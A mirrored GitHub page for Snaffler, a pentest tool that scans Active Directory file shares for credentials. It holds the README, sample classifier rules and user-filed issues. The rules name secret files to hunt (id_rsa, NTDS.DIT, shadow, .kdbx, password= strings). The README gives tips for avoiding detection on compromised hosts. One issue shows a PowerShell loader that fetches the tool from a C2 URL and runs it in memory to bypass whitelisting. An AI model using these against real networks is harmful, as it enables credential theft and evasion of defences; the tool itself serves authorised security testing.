Giter VIP home page Giter VIP logo

snaffler's Introduction

Snaffler

ko-fi

A dictionary definition of "snaffle".

What is it for?

Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment).

It might also be useful for other people doing other stuff, but it is explicitly NOT meant to be an "audit" tool.

I don't want to read all this!!!

Ugh, fine. But we aren't responsible for the results. We wrote all this other stuff for you, but that's okay. We're not mad, just disappointed.

snaffler.exe -s -o snaffler.log

What does it do?

Broadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.

Then YET MORE snaffly appendages enumerate all the files in those shares and use LEARNED ARTIFACTUAL INTELLIGENCE for MACHINES to figure out which ones a grubby little hacker like you might want.

Actually it doesn't do any ML stuff, because doing that right would require training data, and that would require an enormous amount of time that we don't have. Instead, like all good "ML" projects, it just uses a shitload of if statements and regexen.

What does it look like?

Like this!

How do I use it?

If you "literally just run the EXE on a domain joined machine in the context of a domain user" (as people were instructed to do with Grouper2, immediately before they ran it with all the verbose/debug switches on so it screamed several hundred megabytes of stack traces at them) it will basically do nothing. This is our idea of a prankTM on people who don't read README files, because we're monsters.

HOWEVER... if you add the correct incantations, it will enable the aforementioned L.A.I.M. and the file paths where candy may be found will fall out.

The key incantations are:

-o Enables outputting results to a file. You probably want this if you're not using -s. e.g. -o C:\users\thing\snaffler.log

-s Enables outputting results to stdout as soon as they're found. You probably want this if you're not using -o.

-v Controls verbosity level, options are Trace (most verbose), Degub (less verbose, less gubs), Info (less verbose still, default), and Data (results only). e.g -v debug

-m Enables and assigns an output dir for snaffler to automatically take a copy of (or Snaffle... if you will) any found files that it likes.

-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.

-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.

-n Disables computer discovery, takes a comma-separated list of hosts to do share and file discovery on.

-y TSV-formats the output.

-b Skips the LAIM rules that will find less-interesting stuff, tune it with a number between 0 and 3.

-f Limits Snaffler to finding file shares via DFS (Distributed File System) - this should be quite a bit sneakier than the default while still covering the biggest file shares in a lot of orgs.

-a Skips file enumeration, just gives you a list of listable shares on the target hosts.

-u Makes Snaffler pull a list of account names from AD, choose the ones that look most-interesting, and then use them in a search rule.

-d Domain to search for computers to search for shares on to search for files in. Easy.

-c Domain controller to query for the list of domain computers.

-r The maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k.

-j How many bytes of context either side of found strings in files to show, e.g. -j 200

-z Path to a config file that defines all of the above, and much much more! See below for more details. Give it -z generate to generate a sample config file called .\default.toml.

-t Type of log you would like to output. Currently supported options are plain and JSON. Defaults to plain.

-x Max number of threads to use. Don't set it below 4 or shit will break.

-p Path to a directory full of .toml formatted rules. Snaffler will load all of these in place of the default ruleset.

What does any of this log output mean?

Hopefully this annotated example will help:

This log entry should be read roughly from left to right as:

  • at 7:37ish
  • Snaffler found a file it thinks is worth your attention
  • it's rated it "Red", the second most-interesting level
  • it matched a rule named "KeepConfigRegexRed"
  • you can read it, but not modify it
  • the exact regex that was matched is that stuff in the red box
  • it's 208kB
  • it was last modified on January 10th 2020 at quarter-to-four in the afternoon.
  • the file may be found at the path in purple

... and the rest of the line (in grey) is a little snippet of context from the file where the match was.

In this case we've found ASP.NET validationKey and decryptionKey values, which might let us RCE the web app via some deserialisation hackery. Hooray!

Note: after this screenshot was made, Sh3r4 added a thing to prepend the current user and hostname to each line. I don't wanna redo the screenshot tho.

How does it decide which files are good and which files are boring?

The "so simple it's almost a lie" answer:

Each L.A.I.M. magic file finding method does stuff like:

  • Searching by exact file extension match, meaning that any file with an extension that matches the relevant wordlist will be returned. This is meant for file extensions that are almost always going to contain candy, e.g. .kdbx, .vmdk, .ppk, etc.

  • Searching by (case insensitive) exact filename match. This is meant for file names that are almost always going to contain candy, e.g. id_rsa, shadow, NTDS.DIT, etc.

  • Searching by exact file extension match (yet another wordlist) FOLLOWED BY 'grepping' the contents of any matching files for certain key words (yet yet another another wordlist). This is meant for file extensions that sometimes contain candy but where you know there's likely to be a bunch of chaff to sift through. For example, web.config will sometimes contain database credentials, but will also often contain boring IIS config nonsense and no passwords. This will (for example) find anything ending in .config, then will grep through it for strings including but not limited to: connectionString, password, PRIVATE KEY, etc.

  • Searching by partial filename match (oh god more wordlists). This is mostly meant to find Jeff's Password File 2019 (Copy).docx or Privileged Access Management System Design - As-Built.docx or whatever, by matching any file where the name contains the substrings passw, handover, secret, secure, as-built, etc.

  • There's also skip-lists to skip all files with certain extensions, or any file with a path containing a given string.

The real answer:

Snaffler uses a system of "classifiers", each of which examine shares or folders or files or file contents, passing some items downstream to the next classifier, and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies.

These rules can be very simple, e.g. "if a file's extension is .kdbx, tell me about it", or "if a path contains windows\sxs then stop looking at subdirectories and files within that path".

Rules can also use regular expressions, which allow for relatively sophisticated pattern-matching. This is particularly useful when examining file contents, although care should be taken to avoid regexen with a significant performance hit. In large environments these rules may be checked literally millions of times, so minor performance issues can be amplified significantly.

The real power is in Snaffler's ability to chain multiple rules together, and even create branching chains. This allows us to use "cheap" rules like checking file names and extensions to decide when to use "expensive" rules like running regexen across the contents of files, parsing certs to see whether they contain private keys, etc. This is what allows Snaffler to achieve quite deep inspection of files where needed, while also being surprisingly fast for a tool written in a higher-level language like C#.

For example, a very simple ruleset might contain:

  • a rule to discard all files with extensions associated with image files
  • a rule to find all files with the .dmp file extension and snaffle them
  • a rule chain where:
    • the first rule looks for files with the .ps1 file extension, and sends all matching files to both the second and third rules.
    • the second rule looks inside files using regexen designed to find hard-coded credentials in PowerShell code.
    • the third rule looks inside files using regexen designed to find hard-coded credentials in cmd.exe commands, as might be found in .bat or .cmd files, as these are also commonly used within PowerShell scripts.

This approach also lets us maintain a relatively manageable and legible ruleset, and also makes it much easier for the end-user (you) to customise the defaults or develop your own rulesets.

I don't want to write rules, that sounds hard and boring.

You're right, it was.

Snaffler comes with a set of default rules baked into the .exe. You can see them in ./Snaffler/SnaffRules/DefaultRules.

I am a mighty titan of tedium, a master of the mundane, I wish to write my own ruleset.

No problem, you enormous weirdo. You have 2 options.

  1. Edit or replace the rules in the DefaultRules directory, then build a fresh Snaffler. The .toml files in that dir will get baked into the .exe as resources, and loaded up at runtime whenever you don't specify any other rules to use.
  2. Make a directory and stick a bunch of your own rule files in there, then run Snaffler with -p .\path\to\rules. Snaffler will parse all the .toml files in that directory and use the resulting ruleset. This will also work if you just have them all in one big .toml file.

Here's some annotated examples that will hopefully help to explain things better. If this seems very hard, you can just use our rules and they'll probably find you some good stuff.

This is an example of a rule that will make Snaffler ignore all files and subdirectories below a dir with a certain name.

[[ClassifierRules]]
EnumerationScope = "DirectoryEnumeration" # This defines which phase of the discovery process we're going to apply the rule. 
                                          # In this case, we're looking at directories. 
                                          # Valid values include ShareEnumeration, DirectoryEnumeration, FileEnumeration, ContentsEnumeration
RuleName = "DiscardLargeFalsePosDirs" # This can be whatever you want. We've been following a rough naming scheme, but you can call it "Stinky" if you want. ¯\_(ツ)_/¯
MatchAction = "Discard"# What to do with things that match the rule. In this case, we want to discard anything that matches this rule.
                        # Valid options include: Snaffle (keep), Discard, Relay (example of this below), and CheckForKeys (example below)
Description = "File paths that will be skipped entirely." # Not used in the code, just a place for notes really.
MatchLocation = "FilePath" # What part of the file/dir/share to look at to check for a match. In this case we're looking at the whole path.
                           # Valid options include: ShareName, FilePath, FileName, FileExtension, FileContentAsString, FileContentAsBytes,
                           # although obviously not all of these will apply in all EnumerationScopes.
WordListType = "Contains" # What matching logic to apply, valid options are: Exact, Contains, EndsWith, StartsWith, or Regex.
                          # Under the hood these all get turned into regexen one way or another.
MatchLength = 0
WordList = [ 
  # A list of strings or regex patterns to use to match. If using regex patterns, WordListType must be Regex.
	"\\\\puppet\\\\share\\\\doc",
	"\\\\lib\\\\ruby",
	"\\\\lib\\\\site-packages",
	"\\\\usr\\\\share\\\\doc",
	"node_modules",
	"vendor\\\\bundle",
	"vendor\\\\cache",
	"\\\\doc\\\\openssl",
	"Anaconda3\\\\Lib\\\\test",
	"WindowsPowerShell\\\\Modules",
	"Python27\\\\Lib"
]
Triage = "Green" # If we find a match, what severity rating should we give it. Valid values are Black, Red, Yellow, Green. This value is ignored for Discard MatchActions.

This rule on the other hand will look at file extensions, and immediately discard any we don't like.

In this case I'm mostly throwing away fonts, images, CSS, etc.

[[ClassifierRules]]
EnumerationScope = "FileEnumeration" # We're looking at the actual files, not the shares or dirs or whatever.
RuleName = "DiscardExtExact" # just a name
MatchAction = "Discard" # We're discarding these
MatchLocation = "FileExtension" # This time we're only looking at the file extension part of the file's name.
WordListType = "Exact" # and we only want exact matches. 
WordList = [".bmp", ".eps", ".gif", ".ico", ".jfi", ".jfif", ".jif", ".jpe", ".jpeg", ".jpg", ".png", ".psd", ".svg", ".tif", ".tiff", ".webp", ".xcf", ".ttf", ".otf", ".lock", ".css", ".less"] # list of file extensions.

Here's an example of a really simple rule for stuff we like and want to keep.

[[ClassifierRules]]
EnumerationScope = "FileEnumeration" # Still looking at files
RuleName = "KeepExtExactBlack" # Just a name
MatchAction = "Snaffle" # This time we are 'snaffling' these. This usually just means send it to the output, 
                       # but if you turn on the appropriate option it will also grab a copy.
MatchLocation = "FileExtension" # We're looking at file extensions again
WordListType = "Exact" # With Exact Matches
WordList = [".kdbx", ".kdb", ".ppk", ".vmdk", ".vhdx", ".ova", ".ovf", ".psafe3", ".cscfg", ".kwallet", ".tblk", ".ovpn", ".mdf", ".sdf", ".sqldump"] # and a bunch of fun file extensions.
Triage = "Black" # these are all big wins if we find them, so we're giving them the most severe rating.

This one is basically the same, but we're looking at the whole file name. Simple!

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "KeepFilenameExactBlack"
MatchAction = "Snaffle"
MatchLocation = "FileName"
WordListType = "Exact"
WordList = ["id_rsa", "id_dsa", "NTDS.DIT", "shadow", "pwd.db", "passwd"]
Triage = "Black"

This one is a bit nifty, check this out...

[[ClassifierRules]]
EnumerationScope = "FileEnumeration" # we're looking for files...
RuleName = "KeepCertContainsPrivKeyRed" 
MatchLocation = "FileExtension" # specifically, ones with certain file extensions...
WordListType = "Exact"
WordList = [".der", ".pfx"] # specifically these ones...
MatchAction = "CheckForKeys" # and any that we find, we're going to parse them as x509 certs, and see if the file includes a private key!
Triage = "Red" # cert files aren't very sexy, and you'll get huge numbers of them in most wintel environments, but this check gives us a way better SNR!

OK, here's where the powerful stuff comes in. We got a pair of rules in a chain here.

Files with extensions that match the first rule will be sent to second rule, which will "grep" (i.e. String.Contains()) them for stuff in a specific wordlist.

You can chain these together as much as you like, although I imagine you'll start to see some performance problems if you get too inception-y with it.

[[ClassifierRules]]
EnumerationScope = "FileEnumeration" # this one looks at files...
RuleName = "ConfigGrepExtExact"
MatchLocation = "FileExtension" # specifically the extensions...
WordListType = "Exact"
WordList = [".yaml", ".xml", ".json", ".config", ".ini", ".inf", ".cnf", ".conf"] # these ones.
MatchAction = "Relay" # Then any files that match are handed downstream...
RelayTargets = ["KeepConfigGrepContainsRed"] # To the rule with this RuleName! This can also be an array of RuleNames if you want to get real wild and start writing branching rulesets.

[[ClassifierRules]]
RuleName = "KeepConfigGrepContainsRed" # Anyway, this is the target rule. Following a naming convention really helps to make sure you're using the right targets.
EnumerationScope = "ContentsEnumeration" # this one looks at file content!
MatchAction = "Snaffle" # it keeps files that match
MatchLocation = "FileContentAsString" # it's looking at the contents as a string (rather than a byte array)
WordListType = "Contains" # it's using simple matching
WordList = ["password=", " connectionString=\"", "sqlConnectionString=\"", "validationKey=", "decryptionKey=", "NVRAM config last updated"]
Triage = "Red"

Hopefully this convey the idea. I'd recommend taking some of the default rules and tinkering with them until you feel like you've got a good handle on it.

WTF is an "UltraSnaffler"???

A lot of people wanted the ability to look inside file formats that weren't just flat text, like Word documents, PDFs, .eml, etc. Unfortunately, the easiest library for implementing that functionality blew out the final file size on Snaffler.exe by about 1200%, which sucked for a bunch of the popular in-memory execution techniques that had upper limits on how big a file they could be used with.

The solution was UltraSnaffler, which is just a second .sln file that enables the required lib and the relevant code. Build UltraSnaffler.sln, get UltraSnaffler.

WARNING: Snaffler's default rules don't include any that will look inside Office docs or PDFs, because we found it really difficult to write any that weren't going to just take years to finish a run in a typical corporate environment. Be warned, looking inside these docs is a lot slower than looking inside good old fashioned text files, and a typical environment will have an absolute mountain of low-value Office docs and PDFs.

How does the config file thing work?

This is actually really neat IMO.

If you add -z generate onto the end of a Snaffler command line, Snaffler will serialise the configuration object (including whatever aspects of the configuration were set by your args) into a .toml config file, which you can then hand-edit pretty easily (or not) and then re-use at your leisure

For example, if you do:

Snaffler.exe -s -o C:\mydir\snaffler.log -v trace -i \\host.lol.domain\share -p C:\users\someguy\myrules -z generate

Snaffler will parse all your many, many arguments, turn them into a config object, serialise that config object into the following .toml config file:

PathTargets = ["\\\\host.lol.domain\\share"]
ComputerTargetsLdapFilter = "(objectClass=computer)"
ScanSysvol = true
ScanNetlogon = true
ScanFoundShares = true
InterestLevel = 0
DfsOnly = false
DfsShareDiscovery = false
DfsNamespacePaths = []
CurrentUser = "l0sslab\\l0ss"
RuleDir = "C:\\users\\someguy\\myrules"
MaxThreads = 60
ShareThreads = 20
TreeThreads = 20
FileThreads = 20
MaxFileQueue = 200000
MaxTreeQueue = 0
MaxShareQueue = 0
LogToFile = true
LogFilePath = "C:\\mydir\\snaffler.log"
LogType = "Plain"
LogTSV = false
Separator = 32
LogToConsole = true
LogLevelString = "trace"
ShareFinderEnabled = false
LogDeniedShares = false
DomainUserRules = false
DomainUserMinLen = 6
DomainUserNameFormats = ["sAMAccountName"]
DomainUserMatchStrings = ["sql", "svc", "service", "backup", "ccm", "scom", "opsmgr", "adm", "adcs", "MSOL", "adsync", "thycotic", "secretserver", "cyberark", "configmgr"]
DomainUsersWordlistRules = ["KeepConfigRegexRed"]
MaxSizeToGrep = 1000000
Snaffle = false
MaxSizeToSnaffle = 10000000
MatchContextBytes = 200

You may notice that there are many items in here that you didn't pass arguments for. Those values are the default config items, some of which can only be edited easily in the source or via a config file, usually because it didn't seem worth it to add an argument for them.

This sucks, do you have plans to make it suck less?

No it doesn't, you suck.

Also, yes we do.

We're also going to:

  • Add parsing of archive files, ideally treating them as just another dir to walk through looking for goodies.
  • Keep refining the rules and regexen. More words for the wordlists! string[]s for the string throne!

A dumb joke about wordlists.

Who did you steal code from?

The share enumeration bits were snaffled (see what I did there?) from SharpShares, which was written by the exceedingly useful Dwight Hohnstein. (https://github.com/djhohnstein/SharpShares/) Dwight's GitHub profile is like that amazing back aisle at a hardware store that has a whole bunch of tools that make you go "oh man I can't wait til I have an excuse to try this one for realsies..." and you should definitely check it out.

While no code was taken (mainly cos it's Ruby lol) we did steal a bunch of nifty ideas from plunder2 (http://joshstone.us/plunder2/)

Wordlists were also curated from those found in some other similar-ish tools like trufflehog, shhgit, gitrobber, and graudit.

Is it OPSEC safe? (Whatever the hell that means)

Pffft, no. It's noisy as fuck.

Look let's put it this way... If it's the kind of environment where you'd feel confident running BloodHound in its default mode, then uhhh, yeah man... It's real stealthy.

I thought you used this thing on red team gigs?

sigh

OK, I'll give you the real answer.

In default mode, Snaffler looks an awful lot like SharpHound, in a lot of ways. It talks a bunch of LDAP to AD, then it goes out and tries to talk SMB to every Windows machine in the domain. This kind of behaviour is pretty much guaranteed to get you busted in an org that has their shit even slightly together.

HOWEVER...

Snaffler's more-targeted options (especially -i) are a lot less likely to trigger detections.

I am particularly fond of running Snaffler.exe -s -i C:\ on a freshly compromised server or workstation, and I've not seen this behaviour get detected.

Yet.

How can I help or get help?

If you want to discuss via Slack you can ping us (@l0ss or @Sh3r4) on the BloodHound Slack, joinable at https://bloodhoundgang.herokuapp.com/, or chat with a group of contributors in the #snaffler channel.

You can also ping us on Twitter - @mikeloss and @sh3r4_hax

Otherwise file an issue; we'll try.

snaffler's People

Contributors

adindrabkin avatar carlmon avatar cmprmsd avatar coj337 avatar coj337-ccx avatar hackndo avatar hkelley avatar jlyngcoln avatar jonasw234 avatar korving-f avatar l0ss avatar l0ss2 avatar legendoflynkle avatar nheiniger avatar omnifocal avatar sh3r4 avatar smashery avatar ville87 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

snaffler's Issues

Parsing logs

Has anybody written a log parser? Adversarial/red users can possibly get by with a visual scan of the Snaffler log to get what they need. Defenders, especial in environments with hundreds of servers, need to be able to get the Snaffler log into analysis tools to properly review all of the data.

I've started working on parsing in Powershell but I'd appreciate a pointer if anybody has already covered this ground.

param
(    
    [Parameter(Mandatory = $true)] [string] $SnafflerLog
)

$fileItem = Get-Item $SnafflerLog

$reader = New-Object -TypeName System.IO.StreamReader -ArgumentList $fileItem

$pattern = '(?smi)(?<date>.*?) \[(?<type>.+?)\]\s+\{(?<level>.+?)\}\<*(?<rule>.*?)\>*\((?<path>\\\\.+?)\)(?<matched_string>.*)'
$lineRegex = [regex] $pattern

$lineNum = 0

while ($line = $reader.ReadLine() ) 
{   
    $lineNum++ 

    if ($line -match $lineRegex ) 
    {
        # Rules can have unescaped pipes in the regexes so we can't pluck those out (easily) with other regexes
        #   <KeepConfigRegexRed|R|CREATE (USER|LOGIN) .{0,200} (IDENTIFIED BY|WITH PASSWORD)|4.2kB|27/02/2014 13:44:25>
        # Therefore,  we have to nibble our data from both ends of the split array and treat all elemnts that remain in the middle as the pattern match

        $ruleParts = $Matches.rule.Trim() -split '\|'
        $endOfMatchedRegex = $ruleParts.count-3
        $matched_rule = $ruleParts[0]
        $access_level = $ruleParts[1]
        $matched_regex = ($ruleParts[2..$endOfMatchedRegex] -join "|")
        $last_modified = $ruleParts[-1]

        $path = $Matches.path.Trim()
        $type = $Matches.type.Trim()

        $path_parts = $path -split '\\'
        $server =  $path_parts[2]
        $share =   $path_parts[3]
        if($type -eq "file")
        {
            $extension =  ($path_parts[-1] -split "\.")[-1]
        }
        else
        {
            $extension = $null
        }
        
        [pscustomobject] @{
            level = $Matches.level.Trim()
            type = $Matches.type.Trim()
            path = $path
            server = $server
            share = $share
            extension = $extension
            matched_rule = $matched_rule
            access_level = $access_level
            matched_regex = $matched_regex
            last_modified = $last_modified
            matched_string = $Matches.matched_string.Trim()
            log_line_num = $lineNum
        }            
    }
    else
    {
        
#       Handle mutli-line records
    }
}

Running snaffler with custom toml file and parameters

Hello there,

first of all: thanks for your work on this great tool! :)

I'm in a scenario where I'd like to add some custom search patterns via a toml file, but only search in a custom path.
I realized that once you define a toml file with the -z, all other parameters seem to be ignored. (I wanted to add "-i D:\somefolder\path")

Is this by design, that it ignores other parameters? If yes, how can I define a custom search path in the toml file?

Thanks,
Ville

Negative searching for exact file name/folder matches

Hello again!
So my scenario currently is this:
After logging in to a couple of boxes, I realise that whle they are all supposed to have 'Generic EDR', a few hosts do not.

There's a few ways to go about generating a list of hosts that do not have 'Generic EDR' installed, but the easiest way to check would be to simply look for the presence of the folder/files located at C:\program files\GenericEDR\ or C:\program files\GenericEDR\genericedr.exe.

What I'd like to be able to do is generate a list of hosts using snaffler that do not have this folder or file present and then I can target those specifically for further testing. In this use case, no other files or folders would need to be searched for or reported on (ie, the usual file searches need not apply). If a full path is specified C:\program files\GenericEDR\ then it only needs to check for the presence/abscence of that specific path. If only a file name is specified like genericedr.exe then the whole system can be scanned for it and the full path it was found in can be listed as well.

Would this be something that could be added?

Many thanks!

Missing matchcontext data in TSV mode on ACLcrimes branch

Please update line 59 of SnaffleRunner.cs to include element 9.

Options.Separator + "{4}" + Options.Separator + "{5}" + Options.Separator + "{6:u}" + Options.Separator + "{7}" + Options.Separator + "{8}" + Options.Separator + "{9}";

Feature Request - HTML report

I took a quick look at the code to see if for example a HTML report can be generated as output instead of the log with text only. Seams that the output is not generated at a single point in the code but from different modules at run time am i right?

Im missing some output format like html here were the links can be clicked and the colours still remain. This would really improve the usability when running the tool in the background.

Greetings

Permission errors should not be shown to users if a folder/file is not readable

I expect Snaffler to silently ignore errors related to not being able to read a particular file/folder, however, I received this error when running:

[REDACTED\ss23@REDACTED] 2021-09-21 13:14:16Z [Error] System.UnauthorizedAccessException: (5) Access is denied: [\\?\UNC\REDACTED\REDACTED$]
   at Alphaleonis.Win32.NativeError.ThrowException(UInt32 errorCode, String readPath, String writePath)
   at Alphaleonis.Win32.Filesystem.File.CreateFileCore(KernelTransaction transaction, String path, ExtendedFileAttributes attributes, FileSecurity fileSecurity, FileMode fileMode, FileSystemRights fileSystemRights, FileShare fileShare, Boolean checkPath, PathFormat pathFormat)
   at Alphaleonis.Win32.Filesystem.File.GetAccessControlCore[T](Boolean isFolder, String path, AccessControlSections includeSections, PathFormat pathFormat)
   at Alphaleonis.Win32.Filesystem.DirectoryInfo.GetAccessControl(AccessControlSections includeSections)
   at SnaffCore.Classifiers.EffectiveAccess.FileSystemSecurity2..ctor(FileSystemInfo item) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 708
   at SnaffCore.Classifiers.EffectiveAccess.EffectiveAccess.GetEffectiveAccess(FileSystemInfo item, IdentityReference2 id, String serverName) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 113
   at SnaffCore.Classifiers.EffectiveAccess.EffectivePermissions.GetEffectivePermissions(FileSystemInfo filesysInfo, String username) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 88
   at SnaffCore.Classifiers.EffectiveAccess.EffectivePermissions.CanRw(FileSystemInfo filesysInfo) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 39

Add flag/config for "lastModifiedWithin"

It'd be nice to have a config item to only pilfer files e.g last modified in the last 4 years, which will help reduce noise of creds that have since been rolled.

It could very well already exist but don't see such an option in the README/sample config.

Feature Request: Snaffler rga integration for office docs and PDFs

Hey there,

Awesome tool you created there!

Pasting of Office docs and pdfs seems to be a whole new topic on itself and I wonder if you would find it interesting to integrate ripgrepall (rga) into Snaffler.
The tool parses many filetypes for their content. It is written in rust, but still might be worth a shot as I see the plan in your to-do list 😁

Specify targets by IP ranges

My understanding is that -n expects a list of comma separated hostnames or IP addresses. Could you add an option to define targets (scope) by IP ranges in CIDR notation with an eventual possibility to exclude certain IP addresses or subranges with another optional argument?

Misconfigured file ClassifierRule

Hi,
I've got an issue, the exe work perfectly but here is the printing :
Capture d’écran 2023-06-12 151932

I've tried to recompile the exe myself just in case, but still.
I have to say that the scan works, just there are those errors popping and over flooding my screen.

Snaffler doesn't write log file when executed reflectively

Heya,

I'm on a gig where the client has whitelisting enabled but hasn't locked down powershell. So while I can't run the snaffler executable directly i can just run it reflectively through powershell:

$bytes = IEX (New-Object Net.WebClient).DownloadData("https://myc2url/snaffler.exe")
$asm = [System.Reflection.Assembly]::Load($bytes)
$vars = New-Object System.Collections.Generic.List[System.Object]
$vars.Add("-s")
$vars.Add("-o")
$vars.Add("snaffler.log")
$passed = [string[]]$vars.ToArray()
$asm.EntryPoint.Invoke($null, @(,$passed))

Now snaffler itself works perfectly like this, however for some reason the log file never gets written to disk (even tho I did specify the -o snaffler.log argument).

The arguments seem to be parsed successfully cause if I remove the -s option i don't get any console output.

Is this something you've tried and/or is it a limitation on the Snaffler logger?

Thanks

DomainUserRules don't fire if ComputerTargets is specified

I would like to use the DomainUsers discovery but this means I either need to:

a) Split the disco routine for computers/DFS out from users - and then create separate config options for each. This would allow ComputerTargets to be defined but dynamically discover usernames.
or
b) add an LDAP filter to the computer search so that I can use DomainDisco but select targets

I use option B today, in a roundabout way. Before I scan, I search AD for computers based on an LDAP filter. Then I edit the TOML file before I scan. This filtering is important (to me only?) because scanning servers is useful. Scanning workstations has a much higher noise:signal ratio.

Two questions:

  1. Which approach do you think is more generally useful?
  2. Should I bundle any change in the PR I'm already doing for denied share logging, or break it up into two?

Output Files are not UTF-8 encoded

Currently the log-files that Snaffler outputs are ANSI encoded. However, at least VSCode opens the file with UTF-8 encoding and misses e.g. German umlauts:

image

Currently I work around this issue by clicking on UTF-8 and "Reopen the document" with Western (ISO 8859-1) encoding in order to see the umlauts correctly.

I guess this issue is even more visible for other languages 😅

Btw: Rainbow CSV for VSCode is awesome to view the tool output!

Any examples of cascading relays ?

I'm trying to finesse the connection string rules so that those with Integrated Auth are triaged at Yellow and all others (presuming they will have SQL passwords) are Red.

I tried the following (multiple rules, same name, hoping the relay might call each). No dice. Only one rule seems to survive.

Any other tricks?

# Need this relay to hook the next rule
[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "ConfigContentByExt"
MatchAction = "Relay"
RelayTarget = "KeepConfigRegexXXXX"
Description = "Files with these extensions will be subjected to a generic search for keys and such."
MatchLocation = "FileExtension"
WordListType = "Exact"
MatchLength = 0
WordList = [ ".json", ".config"]
Triage = "Green"

[[ClassifierRules]]
EnumerationScope = "ContentsEnumeration"
RuleName = "KeepConfigRegexXXXX"
MatchAction = "Snaffle"
Description = "Match SQL connection strings that appear to have a password."
MatchLocation = "FileContentAsString"
WordListType = "Regex"
MatchLength = 0
WordList = ["Data Source=.+Password=.+"]
Triage = "Red"

[[ClassifierRules]]
EnumerationScope = "ContentsEnumeration"
RuleName = "KeepConfigRegexXXXX"
MatchAction = "Snaffle"
Description = "Match SQL connection strings that appear to use integrated security (so no passwords)."
MatchLocation = "FileContentAsString"
WordListType = "Regex"
MatchLength = 0
WordList = ["Data Source=.+Integrated Security=true"]
Triage = "Yellow"

Execute Snaffler from Non-Domain Joined Computer

Hi,
I recently tried snaffler, but I used it on a non-domain joined computer where I was logged-in using an azure account. I had a VPN connection, so DC was reachable. However it was not working properly. I tried executing it via a runas /netonly command prompt but still not working. I did not find any parameter like --ldapusername --ldappassword.

Will there be support in the future to be able to provide a custom domain / credentials to execute snaffler from a non-domain joined computer?

Compilation of Ultrasnaffler does not work

Hey Mike,

I'm having some trouble compiling the code for UltraSnaffler.

I get an error for missing assembly references on:

using SnaffCore.Classifiers

There is also "Snaffcore.dll not found."

This is what I get when I run "create project" or "projectmappe" how it's called in German VS 🤣

Snaffler builds fine with the Snaffler solution file, but I cannot get it built with UltraSnaffler.sln

Latest Release not finding relevant files or content?

I used Snaffler today (latest release, version 1.0.135) to test something and realized that it doesn't find anything on a target share...
For testing purposes, I created an SMB share on a server, added some test files (including the testfiles from the Snaffler repository in snafflertest/bait/winsxs and snafflertest/dir) and ran Snaffler as follows:

PS C:\_Data\excluded> .\Snaffler.exe -i \\server1.lab.local\DataShare01 -s -o C:\_Data\excluded\snaffout.log -v trace
 .::::::.:::.    :::.  :::.    .-:::::'.-:::::':::    .,:::::: :::::::..
;;;`    ``;;;;,  `;;;  ;;`;;   ;;;'''' ;;;'''' ;;;    ;;;;'''' ;;;;``;;;;
'[==/[[[[, [[[[[. '[[ ,[[ '[[, [[[,,== [[[,,== [[[     [[cccc   [[[,/[[['
  '''    $ $$$ 'Y$c$$c$$$cc$$$c`$$$'`` `$$$'`` $$'     $$""   $$$$$$c
 88b    dP 888    Y88 888   888,888     888   o88oo,.__888oo,__ 888b '88bo,
  'YMmMY'  MMM     YM YMM   ''` 'MM,    'MM,  ''''YUMMM''''YUMMMMMMM   'W'
                         by l0ss and Sh3r4 - github.com/SnaffCon/Snaffler


\\server1.lab.local\DataShare01

[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Info] Parsing args...
[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Degub] Logging to file at C:\_Data\excluded\snaffout.log
[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Degub] Requested verbosity level: trace
[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Degub] Enabled logging to stdout.
[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Degub] Disabled finding shares.
[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Degub] Target path is \\server1.lab.local\DataShare01
[LAB\jdoe@client1] 2023-11-08 08:11:23Z [Info] Parsed args successfully.
[LAB\jdoe@client1] 2023-11-08 08:11:23Z [Degub] Set verbosity level to trace.
[LAB\jdoe@client1] 2023-11-08 08:11:23Z [Info] Creating a TreeWalker task for
[LAB\jdoe@client1] 2023-11-08 08:11:23Z [Info] Created all TreeWalker tasks.
[LAB\jdoe@client1] 2023-11-08 08:16:23Z [Info] Status Update:
ShareFinder Tasks Completed: 0
ShareFinder Tasks Remaining: 0
ShareFinder Tasks Running: 0
TreeWalker Tasks Completed: 0
TreeWalker Tasks Remaining: 1
TreeWalker Tasks Running: 1
